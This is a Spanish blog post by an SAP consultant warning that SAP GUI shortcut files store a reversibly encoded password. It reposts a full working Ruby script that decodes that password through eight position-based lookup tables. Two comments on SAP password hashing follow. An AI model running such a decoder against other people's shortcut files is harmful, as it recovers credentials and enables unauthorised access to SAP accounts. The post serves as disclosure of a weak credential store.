Decodificar la contraseña de acceso a SAP

Decodificar la contraseña de acceso a SAP

Los usuarios pueden crear un acceso directo con los datos de la conexión a SAP mediante el GUI. Hasta aquí nada nuevo, lo preocupante empieza cuanto este acceso directo que es, básicamente, un fichero que contiene la ruta al binario, el usuario y la contraseña codificada se puede decodificar con este pequeño script para mostrar el valor de la contraseña.

Así que ya sabes Consultor Basis, nada de accesos directos.

Os dejo el código en ruby para que lo probeis y me conteis.

#!/usr/bin/env ruby
#
# SAP Easy Access Password Decoder (Kernel 640)
# Supported character set A-Z,a-z,0-9,\/|<>,.;'#~@:[]{}+=()*&^%$£"!`
#
# Author: Mylestro
# Date: 17/02/2011
#

PROG_VER = 1.0

@one, @two, @three, @four, @five, @six, @seven, @eight = Hash.new
@master = Array.new

def populate_arrays
@one = {"19" => "a", "39" => "A", "1A" => "b", "3A" => "B", "1B" => "c", "3B" => "C", "1C" => "d", "3C" => "D", "1D" => "e", "3D" => "E", "1E" => "f", "3E" => "F", "1F" => "g", "3F" => "G", "10" => "h", "30" => "H", "11" => "i", "31" => "I", "12" => "j", "32" => "J", "13" => "k", "33" => "K", "14" => "l", "34" => "L", "15" => "m", "35" => "M", "16" => "n", "36" => "N", "17" => "o", "37" => "O", "08" => "p", "28" => "P", "09" => "q", "29" => "Q", "0A" => "r", "2A" => "R", "0B" => "s", "2B" => "S", "0C" => "t", "2C" => "T", "0D" => "u", "2D" => "U", "0E" => "v", "2E" => "V", "0F" => "w", "2F" => "W", "00" => "x", "20" => "X", "01" => "y", "21" => "Y", "02" => "z", "22" => "Z", "48" => "0", "49" => "1", "4A" => "2", "4B" => "3", "4C" => "4", "4D" => "5", "4E" => "6", "4F" => "7", "40" => "8", "41" => "9", "59" => "!", "5C" => "$", "DB" => "?", "5D" => "%", "38" => "@", "26" => "^", "52" => "*", "50" => "(", "51" => ")", "53" => "+", "45" => "=", "06" => "~", "5B" => "#", "44" => "< ", "46" => ">", "24" => "\\", "57" => "/", "47" => "?", "56" => ".", "54" => ",", "43" => ";", "42" => ":", "5F" => "'", "03" => "{", "05" => "}", "23" => "[", "25" => "]", "18" => "`", "04" => "|"}
@two = {"E0" => "a", "C0" => "A", "E3" => "b", "C3" => "B", "E2" => "c", "C2" => "C", "E5" => "d", "C5" => "D", "E4" => "e", "C4" => "E", "E7" => "f", "C7" => "F", "E6" => "g", "C6" => "G", "E9" => "h", "C9" => "H", "E8" => "i", "C8" => "I", "EB" => "j", "CB" => "J", "EA" => "k", "CA" => "K", "ED" => "l", "CD" => "L", "EC" => "m", "CC" => "M", "EF" => "n", "CF" => "N", "EE" => "o", "CE" => "O", "F1" => "p", "D1" => "P", "F0" => "q", "D0" => "Q", "F3" => "r", "D3" => "R", "F2" => "s", "D2" => "S", "F5" => "t", "D5" => "T", "F4" => "u", "D4" => "U", "F7" => "v", "D7" => "V", "F6" => "w", "D6" => "W", "F9" => "x", "D9" => "X", "F8" => "y", "D8" => "Y", "FB" => "z", "DB" => "Z", "B1" => "0", "B0" => "1", "B3" => "2", "B2" => "3", "B5" => "4", "B4" => "5", "B7" => "6", "B6" => "7", "B9" => "8", "B8" => "9", "A0" => "!", "A5" => "$", "22" => "?", "A4" => "%", "C1" => "@", "DF" => "^", "AB" => "*", "A9" => "(", "A8" => ")", "AA" => "+", "BC" => "=", "FF" => "~", "A2" => "#", "BD" => "< ", "BF" => ">", "DD" => "\\", "AE" => "/", "BE" => "?", "AF" => ".", "AD" => ",", "BA" => ";", "BB" => ":", "A6" => "'", "FA" => "{", "FC" => "}", "DA" => "[", "DC" => "]", "E1" => "`", "FD" => "|"}
@three = {"72" => "a", "52" => "A", "71" => "b", "51" => "B", "70" => "c", "50" => "C", "77" => "d", "57" => "D", "76" => "e", "56" => "E", "75" => "f", "55" => "F", "74" => "g", "54" => "G", "7B" => "h", "5B" => "H", "7A" => "i", "5A" => "I", "79" => "j", "59" => "J", "78" => "k", "58" => "K", "7F" => "l", "5F" => "L", "7E" => "m", "5E" => "M", "7D" => "n", "5D" => "N", "7C" => "o", "5C" => "O", "63" => "p", "43" => "P", "62" => "q", "42" => "Q", "61" => "r", "41" => "R", "60" => "s", "40" => "S", "67" => "t", "47" => "T", "66" => "u", "46" => "U", "65" => "v", "45" => "V", "64" => "w", "44" => "W", "6B" => "x", "4B" => "X", "6A" => "y", "4A" => "Y", "69" => "z", "49" => "Z", "23" => "0", "22" => "1", "21" => "2", "20" => "3", "27" => "4", "26" => "5", "25" => "6", "24" => "7", "2B" => "8", "2A" => "9", "32" => "!", "37" => "$", "B0" => "?", "36" => "%", "53" => "@", "4D" => "^", "39" => "*", "3B" => "(", "3A" => ")", "38" => "+", "2E" => "=", "6D" => "~", "30" => "#", "2F" => "< ", "2D" => ">", "4F" => "\\", "3C" => "/", "2C" => "?", "3D" => ".", "3F" => ",", "28" => ";", "29" => ":", "34" => "'", "68" => "{", "6E" => "}", "48" => "[", "4E" => "]", "73" => "`", "6F" => "|"}
@four = {"49" => "a", "69" => "A", "4A" => "b", "6A" => "B", "4B" => "c", "6B" => "C", "4C" => "d", "6C" => "D", "4D" => "e", "6D" => "E", "4E" => "f", "6E" => "F", "4F" => "g", "6F" => "G", "40" => "h", "60" => "H", "41" => "i", "61" => "I", "42" => "j", "62" => "J", "43" => "k", "63" => "K", "44" => "l", "64" => "L", "45" => "m", "65" => "M", "46" => "n", "66" => "N", "47" => "o", "67" => "O", "58" => "p", "78" => "P", "59" => "q", "79" => "Q", "5A" => "r", "7A" => "R", "5B" => "s", "7B" => "S", "5C" => "t", "7C" => "T", "5D" => "u", "7D" => "U", "5E" => "v", "7E" => "V", "5F" => "w", "7F" => "W", "50" => "x", "70" => "X", "51" => "y", "71" => "Y", "52" => "z", "72" => "Z", "18" => "0", "19" => "1", "1A" => "2", "1B" => "3", "1C" => "4", "1D" => "5", "1E" => "6", "1F" => "7", "10" => "8", "11" => "9", "09" => "!", "0C" => "$", "8B" => "?", "0D" => "%", "68" => "@", "76" => "^", "02" => "*", "00" => "(", "01" => ")", "03" => "+", "15" => "=", "56" => "~", "0B" => "#", "14" => "< ", "16" => ">", "74" => "\\", "07" => "/", "17" => "?", "06" => ".", "04" => ",", "13" => ";", "12" => ":", "0F" => "'", "53" => "{", "55" => "}", "73" => "[", "75" => "]", "48" => "`", "54" => "|"}
@five = {"81" => "a", "A1" => "A", "82" => "b", "A2" => "B", "83" => "c", "A3" => "C", "84" => "d", "A4" => "D", "85" => "e", "A5" => "E", "86" => "f", "A6" => "F", "87" => "g", "A7" => "G", "88" => "h", "A8" => "H", "89" => "i", "A9" => "I", "8A" => "j", "AA" => "J", "8B" => "k", "AB" => "K", "8C" => "l", "AC" => "L", "8D" => "m", "AD" => "M", "8E" => "n", "AE" => "N", "8F" => "o", "AF" => "O", "90" => "p", "B0" => "P", "91" => "q", "B1" => "Q", "92" => "r", "B2" => "R", "93" => "s", "B3" => "S", "94" => "t", "B4" => "T", "95" => "u", "B5" => "U", "96" => "v", "B6" => "V", "97" => "w", "B7" => "W", "98" => "x", "B8" => "X", "99" => "y", "B9" => "Y", "9A" => "z", "BA" => "Z", "D0" => "0", "D1" => "1", "D2" => "2", "D3" => "3", "D4" => "4", "D5" => "5", "D6" => "6", "D7" => "7", "D8" => "8", "D9" => "9", "C1" => "!", "C4" => "$", "43" => "?", "C5" => "%", "A0" => "@", "BE" => "^", "CA" => "*", "C8" => "(", "C9" => ")", "CB" => "+", "DD" => "=", "9E" => "~", "C3" => "#", "DC" => "< ", "DE" => ">", "BC" => "\\", "CF" => "/", "DF" => "?", "CE" => ".", "CC" => ",", "DB" => ";", "DA" => ":", "C7" => "'", "9B" => "{", "9D" => "}", "BB" => "[", "BD" => "]", "80" => "`", "9C" => "|"}
@six = {"A6" => "a", "86" => "A", "A5" => "b", "85" => "B", "A4" => "c", "84" => "C", "A3" => "d", "83" => "D", "A2" => "e", "82" => "E", "A1" => "f", "81" => "F", "A0" => "g", "80" => "G", "AF" => "h", "8F" => "H", "AE" => "i", "8E" => "I", "AD" => "j", "8D" => "J", "AC" => "k", "8C" => "K", "AB" => "l", "8B" => "L", "AA" => "m", "8A" => "M", "A9" => "n", "89" => "N", "A8" => "o", "88" => "O", "B7" => "p", "97" => "P", "B6" => "q", "96" => "Q", "B5" => "r", "95" => "R", "B4" => "s", "94" => "S", "B3" => "t", "93" => "T", "B2" => "u", "92" => "U", "B1" => "v", "91" => "V", "B0" => "w", "90" => "W", "BF" => "x", "9F" => "X", "BE" => "y", "9E" => "Y", "BD" => "z", "9D" => "Z", "F7" => "0", "F6" => "1", "F5" => "2", "F4" => "3", "F3" => "4", "F2" => "5", "F1" => "6", "F0" => "7", "FF" => "8", "FE" => "9", "E6" => "!", "E3" => "$", "64" => "?", "E2" => "%", "87" => "@", "99" => "^", "ED" => "*", "EF" => "(", "EE" => ")", "EC" => "+", "FA" => "=", "B9" => "~", "E4" => "#", "FB" => "< ", "F9" => ">", "9B" => "\\", "E8" => "/", "F8" => "?", "E9" => ".", "EB" => ",", "FC" => ";", "FD" => ":", "E0" => "'", "BC" => "{", "BA" => "}", "9C" => "[", "9A" => "]", "A7" => "`", "BB" => "|"}
@seven = {"61" => "a", "41" => "A", "62" => "b", "42" => "B", "63" => "c", "43" => "C", "64" => "d", "44" => "D", "65" => "e", "45" => "E", "66" => "f", "46" => "F", "67" => "g", "47" => "G", "68" => "h", "48" => "H", "69" => "i", "49" => "I", "6A" => "j", "4A" => "J", "6B" => "k", "4B" => "K", "6C" => "l", "4C" => "L", "6D" => "m", "4D" => "M", "6E" => "n", "4E" => "N", "6F" => "o", "4F" => "O", "70" => "p", "50" => "P", "71" => "q", "51" => "Q", "72" => "r", "52" => "R", "73" => "s", "53" => "S", "74" => "t", "54" => "T", "75" => "u", "55" => "U", "76" => "v", "56" => "V", "77" => "w", "57" => "W", "78" => "x", "58" => "X", "79" => "y", "59" => "Y", "7A" => "z", "5A" => "Z", "30" => "0", "31" => "1", "32" => "2", "33" => "3", "34" => "4", "35" => "5", "36" => "6", "37" => "7", "38" => "8", "39" => "9", "21" => "!", "24" => "$", "A3" => "?", "25" => "%", "40" => "@", "5E" => "^", "2A" => "*", "28" => "(", "29" => ")", "2B" => "+", "3D" => "=", "7E" => "~", "23" => "#", "3C" => "< ", "3E" => ">", "5C" => "\\", "2F" => "/", "3F" => "?", "2E" => ".", "2C" => ",", "3B" => ";", "3A" => ":", "27" => "'", "7B" => "{", "7D" => "}", "5B" => "[", "5D" => "]", "60" => "`", "7C" => "|"}
@eight = {"5F" => "a", "7F" => "A", "5C" => "b", "7C" => "B", "5D" => "c", "7D" => "C", "5A" => "d", "7A" => "D", "5B" => "e", "7B" => "E", "58" => "f", "78" => "F", "59" => "g", "79" => "G", "56" => "h", "76" => "H", "57" => "i", "77" => "I", "54" => "j", "74" => "J", "55" => "k", "75" => "K", "52" => "l", "72" => "L", "53" => "m", "73" => "M", "50" => "n", "70" => "N", "51" => "o", "71" => "O", "4E" => "p", "6E" => "P", "4F" => "q", "6F" => "Q", "4C" => "r", "6C" => "R", "4D" => "s", "6D" => "S", "4A" => "t", "6A" => "T", "4B" => "u", "6B" => "U", "48" => "v", "68" => "V", "49" => "w", "69" => "W", "46" => "x", "66" => "X", "47" => "y", "67" => "Y", "44" => "z", "64" => "Z", "0E" => "0", "0F" => "1", "0C" => "2", "0D" => "3", "0A" => "4", "0B" => "5", "08" => "6", "09" => "7", "06" => "8", "07" => "9", "1F" => "!", "1A" => "$", "9D" => "?", "1B" => "%", "7E" => "@", "60" => "^", "14" => "*", "16" => "(", "17" => ")", "15" => "+", "03" => "=", "40" => "~", "1D" => "#", "02" => "< ", "00" => ">", "62" => "\\", "11" => "/", "01" => "?", "10" => ".", "12" => ",", "05" => ";", "04" => ":", "19" => "'", "45" => "{", "43" => "}", "65" => "[", "63" => "]", "5E" => "`", "42" => "|"}
@master[1] = @one
@master[2] = @two
@master[3] = @three
@master[4] = @four
@master[5] = @five
@master[6] = @six
@master[7] = @seven
@master[8] = @eight
end

def char_lookup(position,current_char)
temp = @master[position]
print temp[current_char]
end

begin
populate_arrays
if ARGV.size != 1
puts "[-] Invalid number of arguments"
exit
end
hash = ARGV[0].split("PW_")
if hash[1].length > 16
puts "[-] Password is over 8 characters, not supported"
exit
end
hash = hash[1]

if hash.length % 2 != 0
puts "[-] Invalid hash length"
exit
end

hash_size = hash.length / 2
print "[+] Decoded password: "
position = 1
value = 0
hash_size.times do
current_char = hash[value,2]
char_lookup(position,current_char)
value = value + 2
position = position.next
#sleep(1)
end
end

via: msploit

cyfuss

cyfuss

Soy Antonio Mejias en la vida real, cyfuss en internet, Líder técnico y consultor OpenText - SAP en mi vida laboral y aficionado a la fotografía y la música el resto del tiempo. Estoy encantado de que te hayas interesado por mi y por lo que hago... no dudes en contactar conmigo!

2 thoughts on “Decodificar la contraseña de acceso a SAP

  • 04/01/2016 at 18:52
    Permalink

    Hola Antonio.

    ¿cómo se puede verificar el usuario sap (B1) via web?, por lo que he visto, en la tabla USR0 está el campo nick, la clave encriptada y un campo salt. ¿que función de encriptación se usa para almacenar la clave?

    Gracias.

    Reply
    • cyfuss
      08/01/2016 at 20:59
      Permalink

      Hola Manuel,

      No estoy muy seguro de la función de encriptación que use el standard de SAP (depende de la versión puede ser MD5 o SHA-1), lo que sí te puedo decir, en caso de que necesites cifrar alguna contraseña via ABAP, es que puedes usar el módulo de función: FIEB_PASSWORD_ENCRYPT para cifrarla y FIEB_PASSWORD_DECRYPT para descifrarla.

      Espero haberte podido ayudar…

      saludos
      Antonio

      Reply

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

12 − 4 =